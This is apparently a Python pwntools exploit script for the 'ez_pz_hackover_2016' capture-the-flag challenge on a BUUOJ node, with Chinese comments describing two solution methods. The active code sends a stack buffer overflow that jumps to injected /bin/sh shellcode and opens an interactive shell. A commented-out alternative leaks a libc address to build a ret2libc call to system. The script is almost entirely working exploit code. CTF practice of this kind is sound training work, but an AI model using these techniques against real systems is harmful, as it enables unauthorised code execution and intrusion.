from pwn import *
from LibcSearcher import *

context(os='linux',arch='i386',log_level='debug')
# io  = remote('192.168.95.131',10001)
io = remote('node4.buuoj.cn',28554)
elf = ELF('./ez_pz_hackover_2016')

pause()

print_got_addr = elf.got["__libc_start_main"]
print_plt_addr = elf.plt["printf"]
main_addr = elf.symbols["main"]
function_chall = 0x08048603
shellcode = asm(shellcraft.sh())

io.recvuntil(b"lets crash: ")
array_real_addr = io.recvuntil(b"\n").replace(b"\n",b"")
array_real_addr = int(array_real_addr, 16)
print(array_real_addr)

io.recvuntil(b"Whats your name?")

io.recvuntil(b">")

payload = b"crashme\x00"
#### 本题一共2种方法。第一种 就是 这个 是 利用 泄漏 __libc_main 函数的地址，算出基址，再算出 system 和 /bin/sh的地址
# payload += flat(b"A"*(26 - len(payload)),print_plt_addr,function_chall,print_got_addr)


# pause()

# io.sendline(payload)

# print(io.recvuntil(b"!\n"))

# real_printf_addr = io.recv(4)
# real_printf_addr = real_printf_addr.ljust(4,b"\x00")
# real_printf_addr = u32(real_printf_addr)
# print("real_printf_address")
# print(hex(real_printf_addr))

# libc = LibcSearcher("__libc_start_main", real_printf_addr)
# base_addr = real_printf_addr - libc.dump("__libc_start_main")
# system_real_addr = base_addr + libc.dump("system")
# real_str_bin_sh_addr = base_addr + libc.dump("str_bin_sh")

# io.recvuntil(b"Whats your name?")
# io.recvuntil(b">")

# payload = b"crashme\x00"
# payload += flat(b"A"*(26 - len(payload)),system_real_addr, function_chall, real_str_bin_sh_addr)

# io.sendline(payload)


# io.interactive()

# pause()

# 以下  ，本题一共2种方法。第二2种 就是 这个 是 利用 栈可以执行的漏洞
payload += flat(b"A"*(26 - len(payload)),array_real_addr - 0x1C, shellcode) 
io.sendline(payload)
io.interactive()
pause()